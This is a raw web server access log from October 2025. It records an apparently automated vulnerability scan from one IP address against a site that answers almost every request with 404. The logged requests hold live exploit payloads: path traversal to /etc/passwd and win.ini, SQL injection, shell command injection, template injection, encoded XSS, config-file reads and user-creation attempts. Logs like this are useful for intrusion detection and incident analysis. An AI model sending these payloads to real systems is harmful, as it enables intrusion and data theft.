205.185.122.202 - - [19/Oct/2025:21:16:53 +0530] "GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:16:54 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20207794868%20%2B%20204862475%20%20%3B HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:16:58 +0530] "GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:16:58 +0530] "GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:16:59 +0530] "GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:16:59 +0530] "GET /anywebmail/login.php?LOGIN_USER_INCLUDE=/etc/passwd HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:17:03 +0530] "POST /main.ehp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:17:05 +0530] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:17:08 +0530] "GET /nuxeo/login.jsp/pwn$%7B869027392+866896950%7D.xhtml HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:17:09 +0530] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:17:13 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:17:15 +0530] "POST /http/index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:17:15 +0530] "POST /http/index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:17:18 +0530] "GET /reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:17:18 +0530] "GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:17:20 +0530] "GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:17:21 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:17:24 +0530] "GET /webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(202)-- HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:17:24 +0530] "GET /v1/submissions HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:17:27 +0530] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:17:28 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:17:29 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:17:33 +0530] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(36975727)),1) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:17:34 +0530] "GET /page/login/login.html HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:17:39 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:17:40 +0530] "GET /get_dkey.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:17:41 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:17:44 +0530] "GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf HTTP/1.1" 404 1140
205.185.122.202 - - [19/Oct/2025:21:17:45 +0530] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:17:48 +0530] "GET /wp-admin/admin-post.php?page=download_video&dl=L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:17:49 +0530] "GET /wp-admin/admin-post.php?page=download_video&dl=Qzpcd2luZG93c1x3aW4uaW5p HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:17:49 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:17:51 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:17:52 +0530] "POST /servlet/FileReceiveServlet HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:17:56 +0530] "POST /uapws/soapFormat.ajax HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:17:57 +0530] "GET /nifi-api/flow/current-user HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:17:57 +0530] "POST /uapws/soapFormat.ajax HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:17:59 +0530] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:21:18:00 +0530] "POST /nagiosql/admin/logbook.php HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:18:03 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:18:04 +0530] "GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:18:07 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:18:08 +0530] "GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:18:08 +0530] "GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:18:11 +0530] "GET /plus/guestbook.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:18:12 +0530] "POST /main.ehp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:18:14 +0530] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=theme&userId= HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:18:15 +0530] "GET /nuxeo/login.jsp/pwn$%7B811883970+857424511%7D.xhtml HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:18:18 +0530] "GET /card_scan.php?No=30&ReaderNo=%60echo%20ywgppqpluiaagocmhkjz%20%3E%20log40678.txt%60 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:18:20 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:18:23 +0530] "POST /linux/pages/upload.jsp HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:18:24 +0530] "GET /reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:18:27 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:21:18:29 +0530] "GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:18:32 +0530] "GET /%2e/WEB-INF/web.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:21:18:34 +0530] "GET /webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(754)-- HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:18:37 +0530] "GET /v1/agent/self HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:18:39 +0530] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:18:43 +0530] "POST /casa/nodes/thumbprints HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:18:45 +0530] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(28137506)),1) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:18:48 +0530] "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:21:18:50 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:18:50 +0530] "GET /get_dkey.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:18:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:18:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:18:54 +0530] "GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf HTTP/1.1" 404 1140
205.185.122.202 - - [19/Oct/2025:21:18:57 +0530] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:18:59 +0530] "GET /wp-admin/admin-post.php?page=download_video&dl=L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:18:59 +0530] "GET /wp-admin/admin-post.php?page=download_video&dl=Qzpcd2luZG93c1x3aW4uaW5p HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:19:01 +0530] "PUT /_users/org.couchdb.user:cuccovbsxdqgpvzvugypuyekrcjjbeem HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:19:02 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:19:04 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:19:05 +0530] "POST /uapws/soapFormat.ajax HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:19:06 +0530] "POST /uapws/soapFormat.ajax HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:19:07 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:19:08 +0530] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:21:19:11 +0530] "GET /v2/ HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:21:19:12 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:19:15 +0530] "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:21:19:16 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:19:18 +0530] "POST /delete_cart_goods.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:19:21 +0530] "GET /plus/guestbook.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:19:24 +0530] "GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:21:19:25 +0530] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=theme&userId= HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:19:28 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:19:30 +0530] "GET /card_scan.php?No=30&ReaderNo=%60echo%20msnbywtuydbawfjbtmga%20%3E%20log46224.txt%60 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:19:34 +0530] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:19:35 +0530] "POST /linux/pages/upload.jsp HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:19:37 +0530] "POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:19:38 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:21:19:41 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:19:42 +0530] "GET /%2e/WEB-INF/web.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:21:19:44 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:19:45 +0530] "GET /v1/agent/self HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:19:48 +0530] "POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:19:49 +0530] "POST /casa/nodes/thumbprints HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:19:55 +0530] "GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(204393355),0x7e),1) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:19:57 +0530] "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:21:20:01 +0530] "GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:20:03 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:20:03 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:20:07 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:20:09 +0530] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:21:20:13 +0530] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:20:14 +0530] "PUT /_users/org.couchdb.user:plbkntlgrdzweljptgpswayawfbwbexx HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:20:17 +0530] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:20:18 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:20:21 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:20:22 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:20:27 +0530] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(186756),9%23 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:20:28 +0530] "GET /v2/ HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:21:20:29 +0530] "GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(3647274),3+from+qs_admin%23-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:20:30 +0530] "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:21:20:33 +0530] "GET /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:20:34 +0530] "POST /delete_cart_goods.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:20:36 +0530] "POST /index.php?option=com_vreview&task=displayReply HTTP/1.1" 404 1012
185.83.30.120 - - [19/Oct/2025:21:20:37 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:20:37 +0530] "GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:21:20:40 +0530] "POST /base/post.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:20:41 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:20:44 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:20:45 +0530] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(5)))iEAn) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:20:47 +0530] "GET /php/connector.minimal.php?cmd=mkfile&name=wgelgitfjb.txt&target=l1_Lw HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:20:48 +0530] "POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:20:50 +0530] "GET /mobile/auth_mobi.php?isAvatar=42&uid=42&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:20:50 +0530] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:20:51 +0530] "GET /mobile/auth_mobi.php?isAvatar=6&uid=6&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:20:51 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:20:54 +0530] "POST /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:20:56 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:20:59 +0530] "POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:21:00 +0530] "POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:21:06 +0530] "GET /web/php/upload.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:21:08 +0530] "GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(209244049),0x7e),1) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:21:12 +0530] "POST /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:21:13 +0530] "GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:21:16 +0530] "POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1" 404 1140
205.185.122.202 - - [19/Oct/2025:21:21:17 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:21:21 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:21:22 +0530] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:21:26 +0530] "GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:21:26 +0530] "GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:21:21:27 +0530] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:21:30 +0530] "POST /api/graphql HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:21:31 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:21:35 +0530] "GET /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:21:36 +0530] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(113021),9%23 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:21:38 +0530] "POST /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:21:39 +0530] "GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(3306116),3+from+qs_admin%23-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:21:41 +0530] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+md5('lzkyt'),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:21:42 +0530] "GET /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:21:45 +0530] "POST /conf_mail.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:21:46 +0530] "POST /index.php?option=com_vreview&task=displayReply HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:21:49 +0530] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:21:49 +0530] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:21:51 +0530] "POST /base/post.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:21:55 +0530] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:21:55 +0530] "GET /AirWatch/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:21:57 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:22:01 +0530] "GET /uapws/service HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:22:02 +0530] "GET /php/connector.minimal.php?cmd=mkfile&name=pjsllqofmg.txt&target=l1_Lw HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:22:04 +0530] "POST /nacos/v1/auth/users/?username=tstrnsktaathnmeh&password=fffpgcwvsrrldhzd HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:22:05 +0530] "POST /v1/auth/users/?username=ihowpupeiqaigczn&password=jgzqfqndxfakcsuj HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:22:05 +0530] "GET /mobile/auth_mobi.php?isAvatar=71&uid=71&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:22:06 +0530] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:22:06 +0530] "GET /mobile/auth_mobi.php?isAvatar=5&uid=5&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:22:09 +0530] "GET /s/bwpjx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1144
205.185.122.202 - - [19/Oct/2025:21:22:09 +0530] "POST /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:22:12 +0530] "GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:22:13 +0530] "POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:22:16 +0530] "GET /ops/Login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:22:17 +0530] "GET /web/php/upload.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:22:21 +0530] "GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(42235*44694),null HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:22:22 +0530] "POST /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:22:26 +0530] "POST /user.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:22:26 +0530] "POST /user.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:22:27 +0530] "POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1" 404 1140
205.185.122.202 - - [19/Oct/2025:21:22:30 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:22:31 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:22:33 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:22:33 +0530] "GET /mgmt/shared/diagnostics/device-stats HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:22:34 +0530] "GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:22:34 +0530] "GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:21:22:35 +0530] "POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:22:36 +0530] "POST /api/graphql HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:22:38 +0530] "GET /script HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:22:39 +0530] "GET /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:22:42 +0530] "POST /upload HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:22:42 +0530] "POST /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:22:45 +0530] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:22:45 +0530] "GET /index.php?target=db_sql.php%253f/../../../../../../../../windows/win.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:22:45 +0530] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+md5('expda'),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:22:48 +0530] "GET /ucms/index.php?do=user HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:22:48 +0530] "POST /conf_mail.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:22:54 +0530] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 404 1166
205.185.122.202 - - [19/Oct/2025:21:22:54 +0530] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:22:55 +0530] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:22:57 +0530] "GET /?cffaction=get_data_from_database&query=SELECT%20md5(1062546) HTTP/1.1" 200 11250
